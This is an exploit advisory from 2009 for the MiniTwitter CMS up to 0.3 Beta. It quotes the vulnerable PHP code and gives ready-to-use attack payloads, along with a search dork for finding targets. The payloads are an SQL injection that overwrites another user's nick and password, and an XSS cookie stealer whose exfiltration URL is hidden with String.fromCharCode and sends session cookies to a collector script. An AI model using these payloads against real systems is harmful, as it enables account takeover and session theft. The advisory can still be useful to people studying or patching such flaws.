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Posted on 25 May 2009

------------------------------------------------------------ MULTIPLE REMOTE VULNERABILITIES --MiniTwitter<=v0.3-Beta--> ------------------------------------------------------------ CMS INFORMATION: -->WEB: http://mt.bioscriptsdb.com/ -->DOWNLOAD: http://sourceforge.net/projects/minitt/ -->DEMO: http://www.bioscripts.net/minitwitter/index.php -->CATEGORY: Social Networking -->DESCRIPTION: Your business needs a private twitter. You can add... several twitters account and use this twitter as a buckup of all... -->RELEASED: 2009-05-01 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "BioScripts" -->CATEGORY: USER OPTIONS CHANGING (SQLi) / COOKIE STEALER (XSS) -->AFFECT VERSION: <= 0.3 Beta -->Discovered Bug date: 2009-05-01 -->Reported Bug date: 2009-05-02 -->Fixed bug date: 2009-05-10 -->Info patch (0.4 Beta): http://sourceforge.net/projects/minitt/ -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ############################## ////////////////////////////// USER OPTIONS CHANGING (SQLi): ///////////////////////////// ############################## <<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>> ----------- FILE VULN: ----------- .. $nombre = $_POST["nombre"]; $apellidos = $_POST["apellidos"]; $dia = $_POST["fechadia"]; $mes = $_POST["fechames"]; $anio = $_POST["fechaanio"]; $correo = $_POST["correo"]; $bio = $_POST["bio"]; $gravatar = $_POST["gravatar"]; $timeline = $_POST["timeline"]; $country = $_POST["country"]; $state = $_POST["state"]; $sex = $_POST["sex"]; $show = $_POST["showing"]; .. $pass1 = $_POST["pass1"]; $pass2 = $_POST["pass2"]; .. $optquery = "UPDATE mt_users SET nombre = '$nombre', apellidos = '$apellidos', country = '$country', state='$state', sex='$sex', correo = '$correo', dia = '$dia', mes = '$mes', anio = '$anio', bio = '$bio', gravatar = '$gravatar' , timeline = '$timeline', showing = '$show', twitter = '$twitter', accounts = '$twitteraccounts' WHERE id_usr = '$id_usr'"; .. ------ PoC: ------ When an user change his options, he can inject sql code and change options of other user Choose any option, for example name. Name: name=y3nh4ck3r', [SQL] /* --------- EXPLOIT: --------- Name: name=y3nh4ck3r',apellidos = 'y3nh4ck3r', nick='y3nh4ck3r' country = 'y3nh4ck3r', state='y3nh4ck3r', sex='0', password=MD5(12345) correo = 'y3nh4ck3r@gmail.com', dia = '0', mes = '0', anio = '0', bio = 'y3nh4ck3r', gravatar = '' , timeline = '', showing = '', twitter = '', accounts = '' WHERE id_usr = '1'/* Return: Changed options for user id 1. nick=y3nh4ck3r password=12345 ############################# ///////////////////////////// COOKIES STEALING VULN (XSS): ///////////////////////////// ############################# <<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>> --------- EXPLOIT: --------- Go to Link --> http://[HOST]/[HOME_PATH]/index.php?go=opt Change your e-mail to: <script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script> Use your PHP Script (Cookies Stealer) When you steal the cookies, you always could log in because their format is: cooknameuniversal= nick user passnameuniversal= password (md5 hash) So they are universal :P ####################################################################### ####################################################################### ##*******************************************************************## ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ## ##*******************************************************************## ##-------------------------------------------------------------------## ##*******************************************************************## ## GREETZ TO: SPANISH H4ck3Rs community! ## ##*******************************************************************## ####################################################################### #######################################################################